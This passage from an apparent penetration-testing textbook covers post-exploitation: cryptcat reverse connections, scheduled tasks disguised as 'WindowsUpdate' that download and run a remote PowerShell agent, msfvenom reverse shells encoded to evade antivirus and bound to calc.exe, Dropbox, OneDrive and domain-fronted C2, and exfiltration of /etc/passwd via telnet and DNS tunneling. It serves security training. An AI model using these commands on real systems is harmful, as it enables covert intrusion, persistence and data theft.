9. The lack of encryption can be resolved using cryptcat, a Netcat variant that uses Twofish encryption to secure data during transmission between the exploited host and the attacker. Twofish encryption, developed by Bruce Schneier, is an advanced symmetric block cipher that provides reasonably strong protection for encrypted data.

To use cryptcat, ensure that there is a listener ready and configured with a strong password using the following command:

```
root@kali:~# cryptcat -k password -l -p 444
```

- 10. Next, upload cryptcat to the compromised system and configure it to connect with the listener's IP address using the following command:
- C:\cryptcat -k password <listener IP address> 444

Unfortunately, Netcat and its variants remain detectable by most antivirus applications. It is possible to render Netcat undetectable using a hex editor to alter the source code of Netcat; this will help avoid triggering the signature matching action of the antivirus, but this can be a long trial-and-error process. A more efficient approach is to take advantage of Empire's persistence mechanisms.

Using schtasks to configure a persistent task

The **Windows Task Scheduler** (schtasks) was introduced as a replacement to at.exe in Windows XP and 2003. However, we can still see at.exe running in the latest version of Windows for backward compatibility. In this section, we will use scheduled tasks to maintain persistent access to a compromised system.

Attackers can create a scheduled task on the compromised system to run the Empire agent payload from the attacker's machine, and then provide backdoor access. schtasks can be scheduled directly from the Command Prompt, as shown in the following screenshot:

C:\Windows\system32> C:\Windows\system32>schtasks /create /tn WindowsUpdate /tr "c:\windows\system32\ powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'I EX ((new-object net.webclient).downloadstring(''http://192.168.0.109/agent.ps1'' '))'" /sc onlogon /ru System schtasks /create /tn WindowsUpdate /tr "c:\windows\system32\powershell.exe -Wind owStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net. webclient).downloadstring(''http://192.168.0.109/agent.ps1'''))'" /sc onlogon /r u System SUCCESS: The scheduled task "WindowsUpdate" has successfully been created.

The following are the typical scheduled tasks scenarios that can be engaged by attackers to maintain persistent access to the system:

- To launch a Empire Powershell agent during the user login process. Run the following command from the command line:
- schtasks /create /tn WindowsUpdate /tr "c:\windows\system32\powershell.exe -Wind
- Similarly, to launch the agent on system start, run the following:
- schtasks /create /tn WindowsUPdate /tr "c:\windows\system32\powershell.exe -Wind
- The following command will to set up to launch an agent when system gets into idle:

schtasks /create /tn WindowsUPdate /tr "c:\windows\system32\powershell.exe -Wind

Attackers will ensure that the listener is always running and open for connection. To legitimize it on the network, the server would need to be set up with a valid SSL certificate running HTTPS, in order not to trigger alerts in the internal security features (the firewall, IPS, or proxy).

The same task can be performed by a single command using the Empire PowerShell tools module persistence/evelated/schtasks*, as shown in the following screenshot:

```
(Empire: powershell/persistence/elevated/schtasks) > set Listener http
(Empire: powershell/persistence/elevated/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: powershell/persistence/elevated/schtasks) >
SUCCESS: The scheduled task "Updater" has successfully been created.
Schtasks persistence established using listener http stored in HKLM:\S
rigger at 09:00.
```

Maintaining persistence with the Metasploit framework

Metasploit's Meterpreter contains several scripts that support persistence on a compromised system. We will examine the persistence script options for placing a backdoor.

Using the persistence script

An effective approach for gaining persistence is to use the Meterpreter prompt's persistence script. Note that this module in Meterpreter has been replaced with post-exploit modules; however, the following example still works in the latest version of Metasploit as of January 2019.

After a system has been exploited and the migrate command has moved the initial shell to a more secure service, an attacker can invoke the persistence script from the Meterpreter prompt.

Using -h in the command will identify the available options for creating a persistent backdoor, as shown in the following screenshot:

In the example shown in the following screenshot, we have configured persistence to run automatically when the system boots, and to attempt to connect to our listener every 5 seconds. The listener is identified as the remote system (-r), with a specific IP address and port.

Additionally, we could elect to use the -u option, which will start persistence when a user logs in to the system:



the local firewall settings to ensure that this port is open, or use the _{reg} command to open the port. As with most Metasploit modules, any port can be selected as long as it is not already in use.

The persistence script places a VBS file in a temporary directory; however, you can use the -L option to specify a different location. The script also adds that file to the local autorun sections of the registry.

Because the persistence script is not authenticated and anyone can use it to access the compromised system, it should be removed from the system as soon as possible after the discovery or completion of penetration testing. To remove the script, confirm the location of the resource file for cleanup, and then execute the following resource command:

```
meterpreter>run multi_console_command -rc /root/.msf4/logs/persistence/VICTIM_20170610.4
```

Creating a standalone persistent agent with Metasploit

The Metasploit framework can be used to create a standalone executable that can persist on a compromised system and allow interactive communications. The advantage of a standalone package is that it can be prepared and tested in advance to ensure connectivity, and encoded to bypass local antivirus software:

- 1. To make a simple standalone agent, use <code>msfvenom</code>. In the example shown in the following screenshot, the agent is configured to use a <code>reverse_tcp</code> shell that will connect to the localhost at the attacker's IP on port 443:
- msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.

The agent, named attack1.exe, will use a Win32 executable template:

root@kali: # msfvenom -a x06 --platform Windows -p windows/meterpreter/reverse_ cp lhost=192.168.0.109 lport=443 -e x86/shikata_ga_nai -i 5 -f exe -o attack1.e e Found 1 compatible encoders Attempting to encode payload with 5 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 360 (iteration=0) x86/shikata_ga_nai succeeded with size 387 (iteration=1) x86/shikata_ga_nai succeeded with size 414 (iteration=2) x86/shikata_ga_nai succeeded with size 414 (iteration=3) x86/shikata_ga_nai succeeded with size 468 (iteration=4) x86/shikata_ga_nai chosen with final size 468 Payload size: 468 bytes Final size of exe file: 73802 bytes Saved as: attack1.exe

This encodes the attack1.exe agent five times using the x86/shikata_ga_nai protocol. Each time it is re-encoded, it becomes more difficult to detect. However, the executable also increases in size.

We can configure the encoding pattern in msfvenom by using -b x64/other to avoid certain characters. For example, the following characters should be avoided when encoding a persistent agent because they may result in discovery and the failure of the attack:

- \x00: Represents a 0-byte address
- \xa0: Represents a line feed
- \xad: Represents a carriage return
- 2. To create a multi-encoded payload, use the following command:

```
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.
```

- 3. You can also encode msfvenom to an existing executable, and both the modified executable and the persistent agent will function. To bind the persistent agent to an executable such as a calculator (calc.exe), first copy the appropriate calc.exe file into Kali Linux. You can download it from your existing session using Meterpreter by running meterpreter > download c:\\windows\\system32\\calc.exe.
- 4. When the file is downloaded, run the following command:
- msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.
- 5. The agent can be placed on the target system, renamed calc.exe (to replace the original calculator), and then executed.

Unfortunately, nearly all Metasploit-encoded executables can be detected by client antivirus software. This has been attributed to penetration testers who have submitted encrypted payloads to sites such as VirusTotal (www.virustotal.com). However, you can create an executable and then encrypt it using Veil-Evasion, as described in chapter 10, *Exploitation*.

Persistence using online file storage cloud services

Every organization that allows file sharing with cloud services is likely to make use of either Dropbox or OneDrive. Attackers can use these file storage services to maintain persistence on compromised systems.

In this section, we will focus on using these file storage cloud services on the victim system and maintaining persistence to run command and control without having to disclose the attacker's backend IP address, using the Empire PowerShell tool.

Dropbox

For companies using Dropbox, this listener serves as a highly reliable C2 channel. The dbx post-exploitation module is preloaded in our Empire PowerShell tool,which utilizes Dropbox infrastructure. Agents communicate with Dropbox, allowing it to be used as a command and control center.

Follow these steps to set up a Dropbox stager:

- 1. Create a Dropbox account
- 2. Go to My Apps on the Dropbox Developers site (https://www.dropbox.com/developers)
- 3. Go to Create App and select Dropbox API
- 4. Select App Folder
- 5. Give a name to your app, for example, Kalic2c
- 6. In the settings for your new app, generate a new access token, as shown in the following screenshot:

| https://www.dropbax.com/v | hvwicpers/apps/life/dive/00/did | | 100 14 | ▲ Ⅲ □ |
|---------------------------|---------------------------------|--|----------------|-------|
| Committing score | | | | |
| References | | Redirect URL | | |
| Getting Started | QAULT 2 | | | |
| AUENANTICATION SYDES | | https:// dittp.ellowed.for/locationti | Add | |
| Branding gaste | | | | |
| Content hands | | Allow implicit grant | | |
| Data ingress guide | | Alcos + | | |
| Namespara gaste | | | | |
| Content access guide | | Generated access token | | |
| Developer guide | | H3telAr9_XAAAAAAAAADgabxBwumwnQ_mili74H3107FF3_XscavGi0KGY17 | le | |
| Coverth guide | | This access token can be used to access your account imasterional. http://www. | AN attacy into | N |
| 10 migration guide | | contraction of the second statement and an entraction | | |
| Webbooks | | | | |
| | Chocces/Saver domains | example, (or) | A00 | |
| O'ocsar | | If using the Chinney or the Sever on a website, the domain of that site. | | |
| Sever | | | | |
| | Webhooks | Webback URIs D | | |

7. You can now use the generated access token to generate the payload on our Empire tool by running the following commands:

```
> listeners
> uselistener dbx
> set apitoken <yourapitoken>
> usestager multi/launcher dropbox
> execute
> launcher powershell
```

The output should be as shown here:



If the API token is correct and everything works, the Dropbox account should now show a folder named Empire, with three subfolders called results, staging, and taskings, as shown in the following screenshot:

| https://www.dropbax.com/home/Empire | | ¥ 🗉 🛤 | Ep (|
|-------------------------------------|----------------|----------------|-------|
| Dropbox > Empire | | (| 4 🖿 |
| Name # | Modified + | Mambers + | · = • |
| results 🛣 | | Only you Share | 44.0 |
| staging | () | Only you | |
| taskings | <u>70</u> | Only you | |

8. Once the listener is up and running, attackers can utilize a number of methods to deliver the payload, for example, by running it from the existing Meterpreter session, by using social engineering, or by creating a scheduled task to report back every time the system boots.

Attackers can make use of any free file hosting service to store the payload, and get the victim machines to download and execute the agent.

A successful agent will report to Empire, as shown in the following screenshot:

| (Empire: listo | nars/dbx) > 1 | isteners | | | | |
|---|--|--|---|--------------|----------|--------|
| *1 Active list | | | | | | |
| Nalski | Module | BOST | | Delay/Jitter | kliinate | |
| dropbox | dbx. | | | 60/0.0 | | |
| <pre>[+] Initial age [+] Sending age [+] Uploading agents</pre> | ant YMSZDERG ent lotage 2) Key negotiati | from 0.0.0.0 now to VMSNDERS three on part 4 (agent) | active (Slack) ogh Dropbox to /Empire/staging | | | |
| [*] Active age | | | | | | |
| Name La I | nternal IP | Machine Name | Username | Process | 019 | Delay |
| YWSIDERG ps 19 103 | 92,168,0,20 | LL. | | powershell | 14184 | 6070.0 |

Microsoft OneDrive

OneDrive is another popular file sharing service, similar to Dropbox. In the latest version of Empire, you should be able to see an additional prebuilt listener, onedrive, as shown in the following screenshot:

```
(Empire: listeners) > uselistener onedrive
(Empire: listeners/onedrive) > info
   Name: Onedrive
Category: third party
Authors:
 @mr64bit
Description:
 Starts a Onedrive listener. Setup instructions here:
 gist.github.com/mr64bit/3fd8f321717c9a6423f7949d494b6cd9
Comments:
 Note that deleting STAGED-PS.txt from the staging folder
 will break existing launchers
Onedrive Options:
 Name
                  Required Value
                                                               Description
                  False
                                                               Your SlackBot A
PI token to communicate with your Slack instance.
 KillDate False
                                                               Date for the li
stener to exit (MM/dd/yyyy).
                              onedrive
 Name
                 True
                                                               Name for the li
stener.
 RedirectURI True
                               https://login.live.com/oauth20 d Redirect URI of
 the registered application
```

Set up the onedrive c2c as follows:

- 1. Create a Microsoft developer account (https://developer.microsoft.com/en-us/sto re/register), or sign up for the Application developer program (https://develop er.microsoft.com).
- 2. Register a new application by entering a name and clicking Create, as shown in the following screenshot:



Register your application

Application Name

| - 11 16 . | | | |
|------------------|----------------------|------------------------|------|
| Juided Setup | | | |
| Let us help yo | u get started | | |
| | | | |
| | | | |
| ly proceeding y | u agree to the Micro | osoft Platform Policie | ic . |
| by proceeding, y | ou agree to the Mich | JSOIL FIGUOITH FOILCIE | 3 |

3. Once the application is created, attackers should be able see a newly created Application ID, as shown here:

Properties

| Name | | |
|--------------------|---|------------------------|
| KaliC2C | | |
| Application Id | | |
| 67b96a34-cfd4-4 | 646-a907-2195fd68427b | |
| | | |
| Applicatic | in Secrets | |
| Generale New Passa | and Generate New Key Pair Upload Public Key | |
| Туре | Password/Public Key | Created |
| Password | uip | Jan 4, 2019 3:41:41 PM |
| Private Key | 302B13DCA702443B82DC29B207598B478BAB4F91 | Jan 4, 2019 3:41:52 PM |

4. Now, we are ready to fire up Empire and set up our listener. Set the clientID (the Application Id from the previous step) and execute the listener, as shown in the following screenshot:



5. The URL can be opened in a browser to generate the authentication code, as shown in the following screenshot:

Secure https://login.live.com/oauth20_desktop.srf?code=Ma15a0456-367a-5605-f4b7-41de395cbd63&lc=1033

6. The code from the URL can now be used to set up the Empire listener, as follows:

| (Empire: listen [*] Starting Li [*] Got new out [*] Creating en [*] Creating en [*] Creating en [*] Creating en [*] Creating en [*] Creating en [*] Creating en | ers/onedrive) > stener 'unedrive h token pize folder (ccessfully start ern/onedrive) > pize/taskings fo pize/zeonits fol ern/onedrive) > | execute ed! [*] Creating empire/stagi lder der listemens | | |
|---|--|--|--|--|
| Name | Module | Host | Delay/Jitter | KillDate |
| onedrive | onedrive | | 60/0,0 | |
| (Empire: listen [1] Flease ente (Empire: listen powershell -noF ZQBYAHMAaQBFAE4 JwBTAHKAcwBOAG1 bwBSAGKAYwB5AFM VQBIACGAJABCAHU awBMAGGAZWBCA5K awEMAGGAZWBCA5K WABPAGGAZWBCA5K | ers) > launcher r 'launcher <lan ers) > launcher > -sta -w 1 -enc AvABBAZIATABLACA AbgAuAZÓAYGBUAGE AZGEÓAHÓAGGBUAGE ATABSACCAXGBDACC AbgBnACCAXGBDACC ApgEnACCAXGBDACC</lan | powershell guage> <listenername>' JABFAHIAcgBVAHIAQQBJAHQA AUABTAFYABQSSAHMASQBVAG4A AIWBTAFYABQSSAHMASQBVAG4A AIWBIAG0AZQBUAHQALgBBAHUA AcwAnACWAJVBOACCAKWANAG6A ARQBUAGEAYGBSAGUAUWBJAHIA ARQBUAGEAYGBSAGUAUWBJAHIA ASQBUAGEAYGBSAGUAUWBJAHIA ASQBUAGEAYGBSAGUAUWBJAHIA</listenername> | aQBVAG4AUABYAGUAZgElAHIAZQBUAH LgBNAEKAagBVAHIAIAALAGCAZQAgAD daBVAG0AYQB0AGKAbWBUAC4AVQB0AG bgBQAHUAYgB3AGKAbWBUAC4AVQB0AG cgBpAPAAdABCACCAKWADAGMAbWBJAG aQBWAHQAQQBDACSAJWBDAGGAYWBJAE uQBWAHQAQgBDAGGAYWBIABKAbgB2AG YQBYAFKAWWBTAHQAcqBDAG4AIWADAB | MAZQAQADÜAIAA MANQETACQAEwe Kababiaccanga QasqEjaccanga satabyagcazwe wabwecascange Macyetabuqaqe Macyetabuqaqe |

7. Just as with Dropbox, now you should be able to see a folder named Empire with three subfolders called results, staging, and taskings in your OneDrive, with the correct Client ID and authentication code, as shown here:



8. Once the payload is executed successfully on the target, this should listen on the OneDrive listener, as shown in the following screenshot:

| (Empire: | -15 | nts) > agenta | | | | | |
|----------|------|---------------|--------------|----------|------------|------|--------|
| | | | | | | | |
| Name | Lini | Internal IP | Machine Name | Usernams | Process | PID | Delay |
| | | | | | | | |
| DCH5V4RF | ' ps | 192.168.1.9 | | | powershell | 6516 | 60/0.0 |

Other public platforms that can be used for persistence C2 include the following:

- Gcat and Gdog Python scripts perform similar C2 using Gmail accounts by allowing insecure apps in the account settings. These scripts can be downloaded from https://github.com/byt3bl33d3r/gcat/archive/master.zip and https://github.com/maldevel/gdog.
- **GitPwnd** is a tool written in Python that allows penetration testers to use a Git repo for C2 on compromised hosts. It can be downloaded from https://github.com/nccgroup/gitpwnd.
- Other proofs of concept for using C2 on Instagram, YouTube, Telegram, and Twitter can be found at https://github.com/woj-ciech/Social-media-c2.

Domain fronting

Domain fronting is a technique engaged by attackers or red teams to avoid detection of command and control servers. It is the art of hiding the attacker's machine behind highly-trusted domains by routing the traffic through an application utilizing someone else's domain name (or, in the case of HTTPS, someone else's SSL certificate).

The most popular services include Amazon's CloudFront, Microsoft Azure and Google App Engine.

The same domain fronting techniques can be used on corporate webmail for C2 and data exfiltration through SMTP protocols.

Note that Google and Amazon both implemented strategies to guard against domain fronting in April 2018. In this section, we will explore how to use Amazon CloudFront and Microsoft Azure for C2, using two different methods.

Using Amazon CloudFront for C2

In order to improve download speed, Amazon provides a **content delivery network** (**CDN**) on a globally distributed network of proxy servers that caches content such as bulky media, videos, and so on. Amazon CloudFront is a CDN offered by Amazon Web Services. The following steps are involved in creating a CDN:

- 1. Firstly, open an AWS account at https://aws.amazon.com/.
- 2. Log in to your account at https://console.aws.amazon.com/cloudfront/home.
- 3. Click Get Started under Web, and select Create distribution.
- 4. Fill in the correct details for each setting, as shown in the following screenshot:



Some of the options are as follows:

- **Origin Domain Name**: The domain name controlled by the attacker.
- **Origin Path**: The value can be set to the root, /.
- **Origin SSL Protocols:** By default, TLS v1.2, TLS v1.1, and TLS v1.0 are enabled.
- **Origin Protocol Policy**: There are three options: HTTP, HTTPS, and Match Viewer. I recommend using Match Viewer, which utilizes both HTTPS and HTTP depending on the protocol of the viewer's request.

- Allowed HTTP Methods: Select GET, HEAD, OPTIONS, PUT, POST, PATCH, DELETE under Default Cache behavior settings.
- Ensure Cache Based on Selected Request Headers is set to All.
- Ensure Forward Cookies is set to All.
- Ensure Query String Forwarding and Caching is set to Forward all, Cache based on all.
- 5. You're all set, so click Create Distribution. You should see the following screen, with the domain name showing as <somerandom>.cloudfront.net:

| and the second | | | | | | | | | 100000 | 12211122 | 11822 |
|----------------|--------------------|----------------|-----------|-----------|------------------------|----------------|-------------|--------|-------------|-------------|-------------|
| Cires | te Distribution | Distribution 5 | stavës 1 | Deleta | Enable Datable | | | | 3 | 0 0 | |
| 10 | wing Ally Delivery | Walton w | Any State | ¥ | 1 | | | | < < V | iewing 1 to | 1 of 1 Here |
| | Delivery Nethod | m | | Dunin | Name | Comment | Origin | CHANES | Status | State | Last No. |
| 11 | Q viet | EXAMPLY | NUTWORKE | tt2Ndonho | n?tämex sloudtront net | This is a test | cybertas co | 5 | C In Progre | Envired | 2018-01 |

It normally takes around 30 minutes to bring up the distribution.

- 6. Once the distribution is created on AWS, you're ready to customize the Empire agent to prepare for the attack. Fire up Empire on the system, pointed to the domain that was used to create the AWS instance.
- 7. Finding frontable domains can be achieved using various scripts; here, we will use the script found at https://github.com/rvrsh3ll/FindFrontableDomains, and use one of the vulnerable hosts to perform the attack.
- 8. Let's now go ahead and create new listener in Empire Powershell. The first step is to use an existing listener; we will use http, then change the name of the listener to Awscloud, and also append the default profile with an additional host. The following is the list of commands to set up a new listener:

```
> listeners
> uselistener http
> set name AwsCloud
> set host vulnerable.host.com:80
> set defaultprofile /admin/get.php,/news.php,/login/process.php|mozilla/5.0 (wi
> execute
> launcher powershell
```

9. Once all the settings are complete for the new listener, attackers should be able to see the following:

| (Empire) > listener [1] No Listener au (Empire: Listener) (Empire: Listener) (Empire: Listener) au(7.0;rv:11.0) li (Empire: Listener) | nt + useliste (ntp) > set (ntp) > set (ke Gecko) H (http) > inf | fre ner http Mame AmsClaud Hast attd29xbnHe9f4mar.claudfront.neter a | vs.php,/login/process.php Mozills/5.0 (windows MT 6.1; WIN64; Tride |
|---|--|---|--|
| Name: HTTP[5] Category: client_se | 1441 | | |
| Authors: (hermjøy | | | |
| Description: Starts a http(s) GET/POST approach | Listener (P | owerShell or Pythen) that uses a | |
| HTTP[S] Options: | | | |
| Name | Required | Value | Description |
| SlackToken PrexyCreds | False False | default | Your SlackBot API taken to communicate with your Slack instance. Proxy credentials (Idomain\]username:pasaword) to use for request |
| Killbate Name Launcher DefaultDelay OrfaultInstlimit WorkingHours SleekChannel DefaultProfile | False True True True True False False True | AwsCloud powershell -neP -sts -w 1 -enc 5 60 Ageneral /edmin/get.php./news.php./login/ process.php[Hoxills/5.6 (Windows NT 6.1; WDW64) Trident/7.5irv:11.0(like Secko) Hostid/95bnb#7times.cloudfront.h | Date for the listener to exit (MM/dd/yyyy). Name for the listener. Laureter string. Agent delay/reach back interval (in seconds). Number of minsed checkins before exiting Hours for the agent to operate 100:00-17:001. The Slack channel or GM that notifications will be sent to. Default communication profile for the epent. |

In this example, we will use the d0.awsstatic.com host to forward the domain request to our C2 server.

Before connecting to Amazon Web Services, the application will perform a DNS lookup to resolve the domain name to a network IP address. The request will go directly to the d0.awsstatic.com host with the host header that we created in the Amazon CloudFront distribution.

A packet capture of the request from Wireshark will look similar to the following screenshot:

| E Fra E E E Fra E E E Fra E E E E E E E E E E E E E E E E E E E | me 15: mernet nsmis: ertext GET /s Cookie | : 16 II, Pro sion t Tr sion t Tr dati d29 req req | 8 b Sr toc Co ans r/g ess pa: xbnl ues | yte: c: ol fer t: ion in: in: t: t: t: t: t: ion in: ion i: t: t: ion ion ion ion ion ion ion ion | s on Pess (ers ol P Pro php ngbh ses f4me RI: (23] | n wi compliant protocol HT sico Sico X.C htt | ire pu_d tocol rP/1 SonP tocol tp:// | (13 Na:5 Sr 1, /Qv bhV dfr /d2 2] | 44 0:6 c: Src 7R8 (30 0nt 9xb | bit 6 (192 Po pQt nP/(| s), 08: .16 rt: 28g 2v7l t\r 7f4 | 16 001 8.0 49 3LX R8p | 8 b 27: .11 565 0t2 | yte d0; 5, D =\r BgJ | s ca b0:6 Dst: st P \n LXpv | <pre>sptured (1344 bits) on interface 0 56), Dst: ArrisGro_02:05:68 (c0:05:c2:02:05:68) : 216.137.63.240 Port: 80, Seq: 148, Ack: 516, Len: 114 "g= "g= nt.net/admin/get.php]</pre> |
|--|--|---|---|---|--|---|--|---|--|--|---|--------------------------------------|---------------------------------|----------------------------------|--|---|
| 0000 | <0.05 | c2 | 02 | 85 | 68 | 88 | 60 | 27 | dØ | Ъð | 66 | 88 | 99 | 45 | 99 | annochen "coffeete |
| 0010 | 00 9a | 02 | 14 | 40 | 68 | 80 | 86 | 00 | 00 | ce | 86 | 00 | 73 | d8 | 89 | ····@··· ····s·· |
| 8972.0 | 3f fø | c1 | 9d | 88 | 50 | cc | de | 12 | 1d | Øb | 44 | 7a | cf | 50 | 18 | ? P DZ . P . |
| 711.7.7 | DO fo | da. | 21 | 88 | 88 | 47 | 45 | 54 | 20 | 2÷ | 61 | 6.4 | 6d | 60 | 64 | I RE T /admin |

10. Once the PowerShell payload is executed on the victim machine, you should now be able to see the agent reporting without any trace of the attacker's IP address on the victim network. All the traffic will look like legitimate connections to AWS:

(Empire: listeners/http) > [*] Sending POWERSHELL stager (stage 1) to *] New agent 8MW6FXZS checked in [+] Initial agent BMW6FXZS from 216.137.62.65 now active (Slack) [*] Sending agent (stage 2) to 8MW6FXZS at 216.137.62.65 (Empire: listeners/http) > agents [*] Active agents: La Internal IP Machine Name Name Username 8MW6FXZS ps 192.168.0.115 *MASTERING\admin METASPLOITABLE3 (Empire: agents) > interact 8MW6FXZS (Empire: 8MW6FXZS) > ipconfig [*] Tasked 8MW6FXZS to run TASK SHELL [*] Agent 8MW6FXZS tasked with task ID 1 (Empire: 8MW6FXZS) > [*] Agent 8MW6FXZS returned results. : Intel(R) PRO/1000 MT Desktop Adapter Description MACAddress : 08:00:27:D0:B0:66 DHCPEnabled : False : 192.168.0.115, fe80::40ab:8801:a334:774d IPAddress : 255.255.255.0,64 IPSubnet

Although many content providers are vulnerable to this type of attack, Google seem to have fixed this attack as of April 2018 by making major changes to their cloud infrastructure. For example, if Company A's domain uses Google's domain as a front, with an additional host header point to Company A, request will be dropped at the Content Delivery Network first node . Similarly, other providers are trying to block these forward or fronting techniques by requiring an additional authorization token or other mechanism.

Using Microsoft Azure for C2

Similar to Amazon's CloudFront, Microsoft has Azure portal for the same purpose, providing fast services to their users. Microsoft Azure uses Verizon and Akamai services to deliver a CDN.

In this example, we will utilize a different technique to perform domain fronting with SSL, using Microsoft Azure CDN and Metasploit.

In order to set up a Microsoft Azure CDN, follow these steps:

- 1. Log in to the Microsoft Azure portal at https://portal.azure.com/.
- 2. Search for CDN, and create a new profile by clicking Add.
- 3. Provide a name for your CDN profile, and select Subscription Type, Resources Group, Region, and Pricing Tier (most of the time, the free tier will be sufficient). Tick Create a New CDN end point Now.
- 4. Provide the CDN Endpoint name and Origin type (we chose custom origin), and click Create. It can take up to two hours to propagate throughout the CDN, as shown in the following screenshot:



- 5. While you wait for the profile to be up, ensure Caching rules is set to Bypass caching for query strings. This is to ensure it does not cache all traffic, just like a real CDN; we just use it as a communication channel instead.
- 6. That should create a new CDN profile, and you should be able to see the

hacker-controlled domain and the Azure CDN, shown in the following screenshot. In our case, mastering.cyberhia.com is the hacker-controlled site, and Masteringkali.azureedge.net is the CDN endpoint, which supports both HTTP and HTTPS (as we chose custom origin):

| P Search (Cht+/) | Custom domain Purge Stop | Delete | |
|-------------------------------|--|-----------------|---|
| 👍 Overview | Recource group (change) C2C | | Endpoint hostname https://MasteringKali.azureedge.ne |
| Activity log | Status Rumino | | Origin hostname |
| 🔺 Access control (IAM) | Location | | Protocols |
| 🖉 Tags | West Europe | | HITP, HITPS |
| X Diagnose and solve problems | Subscription (change) Free Trial | -000 | Optimization type General web delivery |
| Settings | Subscription ID fb7b4e21-3f09-4af0-9c0d+7df08f1462f9 | CONTRACTOR OF T | |
| 🗮 Origin | | 3 | 8 |
| Custom domains | Custom domains | | |
| Compression | HOSTNAME | CUSTOM HTTPS | DETAILS |
| Caching rules | There are no custom domains to display | | |

We will create a Metasploit Meterpreter reverse HTTPS shell using msfvenom, with the domain that does the forwarding, with our header injection as follows:

|msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https lhost=<VULNERABL

Execution of this payload should get a reverse shell on the C2 server that is behind the Microsoft Azure CDN. This technique was actively utilized by APT29 (a Russian nation-state hacking group) to perform covert attacks.

Testers need to ensure that the domain name behind either Azure or Amazon has a valid A record. For Microsoft Azure, you also need to ensure the CNAME is pointed to the right custom domain to make domain fronting work.

Exfiltration of data

The unauthorized transfer of digital data from any environment is known as exfiltration of data (or extrusion of data). Once persistence is maintained on a compromised system, a set of tools can be utilized to exfiltrate data from highly secure environments.

In this section, we will explore different methods that attackers utilize to send files from internal networks to attacker-controlled systems.

Using existing system services (Telnet, RDP, and VNC)

Firstly, we will discuss some easy techniques to quickly grab files when access to compromised systems is time-limited. Attackers can simply open up a port using Netcat by running nc -lvp 2323 > Exfilteredfile, and then run cat /etc/passwd | telnet remoteIP 2323 from the compromised Linux server.

This will display the entire contents of the etc/passwd to the remote host, as shown in the following screenshot:



Another important and fairly simple technique used by attackers with access to any system on the network is to run getgui from the Meterpreter shell, which will enable the RDP. Once the RDP is enabled, attackers can configure their Windows attack to mount the local drive to the remote drive, and exfiltrate all the files from the remote desktop to the local drive.

This can be achieved by going to Remote Desktop Connection and selecting Options, then Local Resources, then Local devices and resources, clicking More, and finally selecting the drive that you want to mount, as shown in the following screenshot:

| Lo | cal devices and resources |
|----|--|
| | Choose the devices and resources on this computer that you want to use in your remote session. |
| | Smart cards |
| | Ports |
| | 🖂 🔲 Drives |
| | Local Disk (C:) |
| | 🚺 Local Disk (D:) |
| | Drives that I plug in later |
| | ① Other supported Plug and Play (PnP) devices |

This will mount the D:// drive of the attacker's local machine to the RDP system. This can be confirmed by logging in to the remote IP using the RDP connection. An additional drive (x:) should be mounted by default, as shown in the following screenshot:



Other traditional techniques involve setting up an SMB server and allowing anonymous access from compromised computers, or utilizing applications such as TeamViewer, the Skype Chrome plugin, Dropbox, Google Drive, OneDrive,
WeTransfer, or any other one-click sharing service for bulk file transfers.

Using the DNS protocol

Adding a data payload to an enterprise's DNS is the easiest way to maintain command and control and also perform data exfiltration, by exploiting the way DNS tunneling is designed to automatically bypass network protections. In this section, we will learn how to utilize DNSteal to perform data exfiltration through the DNS protocol on UDP 53, by setting up a fake DNS server on the network and/or on the internet.

DNSteal is a Python tool that attackers can use to send files and folders over the DNS protocol by setting up a fake DNS server. The latest version is 2.0; we hope it will be integrated into Kali Linux in later versions.

DNSteal can be downloaded from https://github.com/m57/dnsteal/:

```
git clone https://github.com/m57/dnsteal/
cd dnsteal
python dnsteal.py 192.168.1.104 -z -s 4 -b 57 -f 17
```

Attackers will now be able to launch a fake DNS server and run it on the specified IP with the following switches:

The following are the details of the options used:

- -*z*: To unzip any incoming files, especially used for large file transfers on the network
- -s: To set the number of data subdomains per request
- -b: The number of bytes to send per subdomain
- -f: Length of filename per request

The advantage of utilizing DNSteal is that it also provides the commands to be run on the compromised host.

Run the following command:

|f=List.txt; s=4;b=57;c=0; for r in \$(for i in \$(gzip -c \$f| base64 -w0 | sed "s/.\{\$b\}/

The command running system/server performs multiple DNS queries to the fake

DNS server by adding a data payload, in the following example, if it is an internal file, /etc/passwd, to be transferred over the network directly to the server:



Once the script is run on the compromised machine, attackers should be able to see the following message in their DNSteal console:

| [+] | Once | file | s have | sent, | use | Ctrl+C | to | exit | and | save. | | | |
|-----------|-------------------------|----------------|------------------|------------------|----------------|--------------------|------------|----------------|-------|--------|--------|---------|---------|
| [>] | len: | 245 | bytes | - 1 | List | t.txt | | | | | | | |
| [>] | len: | 245 | bytes | 1 - | List | t.txt | | | | | | | |
| [>] | len: | 1245 | bytes | - | List | t.txt | | | | | | | |
| [>] | len: | 1245 | bytes | - | List | t.txt | | | | | | | |
| [>] | len: | 1245 | bytes | - 1 | List | t.txt | | | | | | | |
| [>] | len: | 1245 | bytes | - | List | t.txt | | | | | | | |
| [>] | len: | 1245 | bytes | - | List | t.txt | | | | | | | |
| [>] | len: | 245 | bytes | - | List | t.txt | | | | | | | |
| [>] ^C | len: | '117 | bytes | - | List | t.txt | | | | | | | |
| [In: | fo] S a Ssum] | aving '301' | reciev 77bdb2 | ved by 1b8a15 | tes (50b3d | to './r dfc970d | eci c04 | eved_2 19c' | 2017- | -06-13 | _12-2(| 0-57_I. | ist.txt |

When the file transfer is complete, the file will be available in the ./ folder with the following naming convention: received_year_month_date_time_filename. Testers will be able to see the contents of the file, as shown in the following screenshot:

